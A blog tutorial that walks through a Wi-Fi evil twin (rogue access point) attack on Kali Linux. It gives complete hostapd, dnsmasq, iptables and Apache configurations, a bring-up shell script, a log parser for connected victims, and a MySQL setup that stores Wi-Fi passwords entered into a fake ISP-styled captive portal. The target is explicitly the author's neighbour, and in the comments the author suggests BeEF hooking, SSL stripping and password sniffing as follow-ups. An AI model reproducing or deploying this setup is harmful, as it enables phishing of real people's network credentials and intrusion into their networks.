DEV Community

Thanos Stantzouris

Posted on • Originally published at sudorealm.com

Evil Twin Attack Example on Kali Linux

Hello to all hackers, coders, designers, and overall tech lovers! My name is Thanos and I am a web developer by day and a hacker by night. Fusing these two crafts, like Goten and Trunks, produces a beautiful offspring of the well-known phishing attack: the Evil Twin, also called a Rogue Access Point. The idea is simple: broadcast a Wi-Fi network with the same name as the victim's, serve a fake "re-enter your Wi-Fi password" page to anyone who connects, and store whatever they type.

Let's dive in! Ready? GO!


Hol'Up!

Hacking without permission is a criminal offense. These tutorials and write-ups are for educational purposes only.
Anyway... take a look at that GitHub repo: AnonSurf 😏 Thank me later.

Note: this post is a condensed version of a 15-minute read. You can find the full, detailed post on my blog, Sudorealm.

Preparing the Attack

For this attack we mostly need:

  • A laptop or PC running Kali Linux... somehow! Many are the ways of the force.
  • A wireless adapter whose driver supports both monitor mode and AP mode (the Alfa cards are the usual choice; hostapd cannot broadcast on a card without AP support).
  • The Aircrack-ng suite (airmon-ng, airodump-ng), to survey the wireless networks around us.
  • hostapd, which makes our wireless card broadcast as an Access Point.
  • dnsmasq, which answers the clients' DNS requests and acts as a DHCP server to hand out IP addresses.
  • iptables, to NAT and forward traffic between eth0 and the wlan0mon interface so clients get internet access.
  • A captive portal website, the web page that pops up when the victim connects to our Access Point.
  • MySQL (MariaDB on Kali), to save the captured credentials to a database.
  • apache2, a local web server for easy peasy lemon squeezy instant hosting.
  • Patience and a clear mind. If you forget to bring these, you are doomed.

Code and Lines and Lines of Code

Always start with an apt-get update

Install dnsmasq

apt-get install dnsmasq -y

Check or install hostapd

hostapd -h                  # prints the usage text if it is already installed
apt-get install hostapd     # install it otherwise

Wireless adapter in monitor mode

airmon-ng start wlan0

This creates the monitor-mode interface wlan0mon that the rest of the configs refer to (check the name airmon-ng prints; it can differ). airmon-ng also lists the processes that will fight you for the card, typically NetworkManager and wpa_supplicant; run airmon-ng check kill before going on, or they will keep reclaiming the interface.

Set up the dnsmasq conf

Create a file named dnsmasq.conf and place the following inside. It assumes wlan0mon carries the address 10.0.0.1/24; nothing below assigns that address, so give it to the interface (ip addr add) before starting dnsmasq.

# The interface dnsmasq serves DHCP and DNS on
interface=wlan0mon

# IP range handed out to clients, the netmask, and an 8 hour lease time
dhcp-range=10.0.0.10,10.0.0.100,255.255.255.0,8h

# DHCP option 3: the default gateway pushed to clients (this machine)
dhcp-option=3,10.0.0.1

# DHCP option 6: the DNS server pushed to clients (this machine)
dhcp-option=6,10.0.0.1

# Upstream resolver; not consulted while the address= line below catches every name
server=8.8.8.8

# Log every DNS query and every DHCP transaction
log-queries
log-dhcp

# Answer every DNS name with 10.0.0.1 so whatever the victim browses to lands on the captive portal
address=/#/10.0.0.1
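As an added example (not code from the original post), here is a small shell helper for reading the log that the log-dhcp and log-queries options above produce: it lists every lease dnsmasq handed out and flags the clients that resolved one of the well-known captive-portal probe hostnames, which is the moment their OS is about to pop the portal page. The log lines embedded in the script are constructed for this example in dnsmasq's syslog format; on the live box feed it the output of journalctl -u dnsmasq, or the file you redirected dnsmasq to. The probe-host list is the usual set (Android, iOS/macOS, Windows, Firefox), not an exhaustive one.

```shell
#!/bin/sh
# Added example, not part of the original post. Reads a dnsmasq log (syslog or
# "dnsmasq -d" format; field-based parsing works for both) and reports who joined
# the rogue AP and which of them fired a captive-portal probe lookup.

# Constructed sample log for this example (not a real capture).
SAMPLE_LOG='Jan  1 12:00:01 kali dnsmasq-dhcp[4242]: DHCPDISCOVER(wlan0mon) aa:bb:cc:dd:ee:01
Jan  1 12:00:01 kali dnsmasq-dhcp[4242]: DHCPOFFER(wlan0mon) 10.0.0.10 aa:bb:cc:dd:ee:01
Jan  1 12:00:02 kali dnsmasq-dhcp[4242]: DHCPREQUEST(wlan0mon) 10.0.0.10 aa:bb:cc:dd:ee:01
Jan  1 12:00:02 kali dnsmasq-dhcp[4242]: DHCPACK(wlan0mon) 10.0.0.10 aa:bb:cc:dd:ee:01 android-9f3
Jan  1 12:00:03 kali dnsmasq[4242]: query[A] connectivitycheck.gstatic.com from 10.0.0.10
Jan  1 12:00:03 kali dnsmasq[4242]: config connectivitycheck.gstatic.com is 10.0.0.1
Jan  1 12:00:05 kali dnsmasq-dhcp[4242]: DHCPACK(wlan0mon) 10.0.0.11 aa:bb:cc:dd:ee:02 iPhone
Jan  1 12:00:06 kali dnsmasq[4242]: query[A] captive.apple.com from 10.0.0.11
Jan  1 12:00:06 kali dnsmasq[4242]: config captive.apple.com is 10.0.0.1
Jan  1 12:00:09 kali dnsmasq[4242]: query[A] www.example.com from 10.0.0.11
Jan  1 12:00:12 kali dnsmasq-dhcp[4242]: DHCPACK(wlan0mon) 10.0.0.12 aa:bb:cc:dd:ee:03'

# Hostnames the major OSes resolve to decide whether they sit behind a captive
# portal. Well known, not exhaustive.
PROBE_HOSTS='connectivitycheck.gstatic.com connectivitycheck.android.com clients3.google.com captive.apple.com www.msftconnecttest.com detectportal.firefox.com'

# stdin: dnsmasq log. stdout: "ip mac hostname" per DHCPACK, i.e. per lease actually
# handed out. A client that sent no hostname (last sample line) gets "-".
dhcp_clients() {
  awk '{
    for (i = 1; i <= NF; i++)
      if ($i ~ /^DHCPACK\(/) {
        host = (i + 3 <= NF) ? $(i + 3) : "-"
        print $(i + 1), $(i + 2), host
      }
  }'
}

# stdin: dnsmasq log. stdout: "ip probe-host" for every query[A] of a known probe host.
probe_hits() {
  awk -v hosts="$PROBE_HOSTS" '
    BEGIN { n = split(hosts, h, " "); for (j = 1; j <= n; j++) known[h[j]] = 1 }
    /query\[A\]/ {
      for (i = 1; i <= NF; i++)
        if ($i == "query[A]") { name = $(i + 1); ip = $(i + 3) }
      if (name in known) print ip, name
    }'
}

# stdin: dnsmasq log. One line per lease, with the probe hosts that client looked up.
report() {
  log=$(cat)
  printf '%s\n' "$log" | dhcp_clients | while read -r ip mac host; do
    probes=$(printf '%s\n' "$log" | probe_hits | awk -v ip="$ip" '$1 == ip { print $2 }' | tr '\n' ',' | sed 's/,$//')
    printf '%-12s %-18s %-14s %s\n' "$ip" "$mac" "$host" "${probes:-no-probe-yet}"
  done
}

printf '%s\n' "$SAMPLE_LOG" | report
```

A lease with no probe listed is a device that connected but has not asked about the portal yet (or one that probes over a hostname not in the list); a lease that shows a probe is a device whose popup should already be on screen.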

Set up the hostapd conf

Create a new file named hostapd.conf and write:

# The interface hostapd switches into AP mode (the driver must support AP mode)
interface=wlan0mon
driver=nl80211
# The SSID to impersonate; it must match the target network's name exactly (case-sensitive)
ssid=neighborAP
# 2.4 GHz, on the same channel as the real AP
hw_mode=g
channel=8
# Accept every client MAC, and broadcast the SSID so the network is visible
macaddr_acl=0
ignore_broadcast_ssid=0

There are no wpa= lines, so the evil twin is an open network. That is the point: the victim's device sees a familiar name with no password, joins it, and the portal then asks for the "Wi-Fi password" that we store.

To find the SSIDs of the surrounding APs and the channels they broadcast on, run:

airodump-ng wlan0mon

Set up the iptables rules

Create a new file named iptablesRules.sh:

#!/bin/sh
# Start from clean filter and NAT tables (a plain --flush leaves the nat table alone)
iptables --flush
iptables --table nat --flush
# Rewrite the source address of everything leaving through the uplink to eth0's address
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
# Allow traffic arriving from the rogue AP to be forwarded
iptables --append FORWARD --in-interface wlan0mon -j ACCEPT
# Turn on IPv4 forwarding in the kernel
echo 1 > /proc/sys/net/ipv4/ip_forward

Make it executable with chmod +x iptablesRules.sh and run it as root. Note that with address=/#/10.0.0.1 in dnsmasq.conf every hostname already resolves to us, so these rules only matter for traffic sent straight to an IP address (or if you later narrow the DNS hijack).
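Putting the steps above together, here is an added bring-up script that is not part of the original post. It checks that the tools are installed, validates the SSID and channel, generates the dnsmasq and hostapd configs from the values used above, assigns the gateway address 10.0.0.1/24 to wlan0mon (the configs assume it but nothing above performs it), enables NAT and forwarding, and starts dnsmasq and hostapd; a down action undoes it. The interface names, address plan, SSID and channel are the post's values and are assumptions you override through environment variables; the up and down actions need root and a card whose driver supports AP mode, while the validation and config-generation functions run anywhere.

```shell
#!/bin/sh
# Added example, not from the original post: bring the rogue AP up or down in one go.
# Defaults are the values used in the post (assumptions; override via environment):
#   AP_IF=wlan0mon UPLINK_IF=eth0 GW_IP=10.0.0.1 SSID=neighborAP CHANNEL=8
# Usage (as root):  sh rogue_ap.sh up      sh rogue_ap.sh down
set -u

AP_IF="${AP_IF:-wlan0mon}"
UPLINK_IF="${UPLINK_IF:-eth0}"
GW_IP="${GW_IP:-10.0.0.1}"        # IPv4 dotted quad; the /24 is derived from it below
SSID="${SSID:-neighborAP}"
CHANNEL="${CHANNEL:-8}"
WORKDIR="${WORKDIR:-/tmp/eviltwin}"

# 802.11 SSIDs are 1..32 bytes; hostapd refuses anything longer.
valid_ssid() {
  [ "${#1}" -ge 1 ] && [ "${#1}" -le 32 ]
}

# hw_mode=g is 2.4 GHz, so only channels 1..14 exist (13 in most regulatory domains).
valid_channel() {
  case "$1" in
    '' | *[!0-9]*) return 1 ;;
  esac
  [ "$1" -ge 1 ] && [ "$1" -le 14 ]
}

# The post's dnsmasq.conf, parameterised. address=/#/ answers every DNS name with the
# gateway, so whatever the victim browses to lands on the portal.
gen_dnsmasq_conf() {
  iface=$1; gw=$2; net=${gw%.*}          # 10.0.0.1 -> 10.0.0
  cat <<EOF
interface=$iface
bind-interfaces
dhcp-range=$net.10,$net.100,255.255.255.0,8h
dhcp-option=3,$gw
dhcp-option=6,$gw
log-queries
log-dhcp
address=/#/$gw
EOF
}

# The post's hostapd.conf, parameterised and validated (open network: no wpa= lines).
gen_hostapd_conf() {
  valid_ssid "$2"    || { echo "ssid must be 1-32 bytes" >&2; return 1; }
  valid_channel "$3" || { echo "channel must be 1-14 for hw_mode=g" >&2; return 1; }
  cat <<EOF
interface=$1
driver=nl80211
ssid=$2
hw_mode=g
channel=$3
macaddr_acl=0
ignore_broadcast_ssid=0
EOF
}

# Fail early if any tool the procedure relies on is missing.
check_tools() {
  missing=0
  for t in hostapd dnsmasq iptables ip airmon-ng; do
    command -v "$t" >/dev/null 2>&1 || { echo "missing: $t" >&2; missing=1; }
  done
  return $missing
}

ap_up() {
  check_tools || return 1
  mkdir -p "$WORKDIR"
  gen_dnsmasq_conf "$AP_IF" "$GW_IP" > "$WORKDIR/dnsmasq.conf"
  gen_hostapd_conf "$AP_IF" "$SSID" "$CHANNEL" > "$WORKDIR/hostapd.conf" || return 1
  airmon-ng check kill >/dev/null          # stop NetworkManager/wpa_supplicant reclaiming the card
  ip link set "$AP_IF" up
  ip addr flush dev "$AP_IF"
  ip addr add "$GW_IP/24" dev "$AP_IF"     # the gateway address the dnsmasq config hands out
  sysctl -w net.ipv4.ip_forward=1 >/dev/null
  iptables -F; iptables -t nat -F
  iptables -t nat -A POSTROUTING -o "$UPLINK_IF" -j MASQUERADE
  iptables -A FORWARD -i "$AP_IF" -o "$UPLINK_IF" -j ACCEPT
  iptables -A FORWARD -i "$UPLINK_IF" -o "$AP_IF" -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
  dnsmasq -C "$WORKDIR/dnsmasq.conf" -d > "$WORKDIR/dnsmasq.log" 2>&1 &
  echo $! > "$WORKDIR/dnsmasq.pid"
  hostapd "$WORKDIR/hostapd.conf"          # foreground; Ctrl-C it, then run "down"
}

ap_down() {
  [ -f "$WORKDIR/dnsmasq.pid" ] && kill "$(cat "$WORKDIR/dnsmasq.pid")" 2>/dev/null
  iptables -F; iptables -t nat -F
  ip addr flush dev "$AP_IF"
  sysctl -w net.ipv4.ip_forward=0 >/dev/null
}

case "${1:-}" in
  up)   ap_up ;;
  down) ap_down ;;
esac
```

bind-interfaces keeps dnsmasq from failing on port 53 when another resolver is listening on the box, and the conntrack rule lets replies to the clients back through FORWARD once you want them to have real internet access. hostapd stays in the foreground so you can watch the association log; the dnsmasq log lands in the work directory.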

Set up the Apache2 rewrite rules

We need to add a few lines to the apache2 configuration so that every request, whatever URL the victim's device asks for, is answered by the captive portal. That is what makes the login page pop up the moment the victim connects.

To do so, type: gedit /etc/apache2/sites-enabled/000-default.conf and paste the block below right after the closing </VirtualHost> line that is already there:

# this closing tag already exists; add the block after it
</VirtualHost>

<Directory "/var/www/html">
    RewriteEngine On
    RewriteBase /
    # strip a leading "www." so both forms of a host hit the same rules
    RewriteCond %{HTTP_HOST} ^www\.(.*)$ [NC]
    RewriteRule ^(.*)$ http://%1/$1 [R=301,L]

    # anything that is not an existing file or directory is served by the portal index
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule ^(.*)$ / [L,QSA]
</Directory>

After saving, check that the rewrite module is enabled:

a2enmod rewrite

If it already is, it tells you so ("Module rewrite already enabled"). If it just enabled it, restart Apache so the module is loaded (service apache2 restart), and run apache2ctl configtest if you want to be sure the pasted block parses before the victim does.

Setting up the code for the captive portal

Now, this section is tricky because it depends on your neighbor, and specifically on which internet provider he or she uses: the portal has to look like that provider's router page.
Mine uses Cosmote, so I had to code something in their style to grab his attention.

On your terminal, copy the contents of the evilTwin folder from my repo into the Apache document root, /var/www/html.

Start the Apache2 web server

service apache2 start

Captive portal for credential theft

So far, so good! But we still need the page to store the submitted credentials in a database, which is the next step.

Setting up the MySQL database

If you open the dbconnect.php file in my repo, the following lines are the settings needed for a successful connection to the database. They have to match the database, user and table created below.

<?php
// Database connection setup
$host     = "localhost";
$username = "dodgers";
$pass     = "duck";
$dbname   = "eviltwin";
$tbl_name = "wpa_keys";

       ___
      /]_/
     |\/|.--/'-.
     \|/:o /  /\    ._,
        \_/_.'0/    _|_
         \____]] (>[___]=]]]===
         /    \___/P{]
      __//    /----\/
     (_[-'\__/_
         / | | \
        '=='='=='
       ____||||___
      (_""_/ \_""_)

Of the 24 and 1 half century

Get ready for some code spraying

  • Start the MySQL service and open a root shell on it
root@kali:~# service mysql start
root@kali:~# mysql -u root -p
Enter password:

Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 38
Server version: 10.3.24-MariaDB-2 Debian buildd-unstable

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]>

There is no password by default, just press Enter. 😁

  • Create your database
MariaDB [(none)]> create database eviltwin;
Query OK, 1 row affected (0.000 sec)

MariaDB [(none)]> use eviltwin;
Database changed

MariaDB [eviltwin]>
  • Create a new user and grant it all privileges on the DB (the same credentials dbconnect.php uses)
MariaDB [eviltwin]> create user dodgers@localhost identified by 'duck';
Query OK, 0 rows affected (0.000 sec)

MariaDB [eviltwin]> grant all privileges on eviltwin.* to 'dodgers'@'localhost';
Query OK, 0 rows affected (0.000 sec)
  • Create the table. A WPA/WPA2 passphrase can be up to 63 characters, so size the columns for that; a varchar(32) would silently truncate long keys (or reject them in strict mode).
MariaDB [eviltwin]> create table wpa_keys(password1 varchar(64), password2 varchar(64));
Query OK, 0 rows affected (0.015 sec)

MariaDB [eviltwin]> show tables;
+--------------------------+
| Tables_in_eviltwin       |
+--------------------------+
| Hidden_NSA_Exploits      |
| s3cretsSn0wdendoesntKnow |
| wpa_keys                 |
+--------------------------+

While you are in MariaDB you can also run raw SQL commands to do all kinds of stuff!

MariaDB [eviltwin]> insert into wpa_keys(password1, password2) values ("p@s$w0rd!@#", "p@s$w0rd!@#");
Query OK, 1 row affected (0.003 sec)

MariaDB [eviltwin]> select * from wpa_keys;
+-------------+-------------+
| password1   | password2   |
+-------------+-------------+
| p@s$w0rd!@# | p@s$w0rd!@# |
+-------------+-------------+
1 row in set (0.000 sec)

Here we inserted a pair of passwords by hand and then listed what is inside wpa_keys. Pretty cool, right? Not a sign of a GUI. The portal's PHP does the same insert with whatever the victim types into the two password fields.

Now you should have a captive portal up and running with no problems whatsoever. The only thing left to do is D E P L O Y.

You can continue reading about the Deployment Phase on Sudorealm.com!
BUT WAIT Since you are about to dive into deep hacking waters, you should go in with style! 🎡Best Hacking Anthem Everrrrrr🎡

Thank you for reading 🍻


Shoutouts

Twitter: @DevThanos

Top comments (2)

vupt-98

Hi. I want to ask: after the victim clicks on the fake network, can the victim access the internet, and is he automatically redirected? I mean, what happens after the victim clicks on the fake web page and fills in the information?

Thanos Stantzouris

That's a good question.
After the victim fills in the information, you don't want him to continue on that network. You want to infiltrate his/hers ;)

After you have successfully connected to your victim's network, you can pretty much do a number of things... monitor the traffic, DNS poisoning and redirection to BeEF-hooked websites, drop the SSL certificates and sniff clear-text passwords... Not to give you ideas or anything :P Your imagination can go wild, my friend!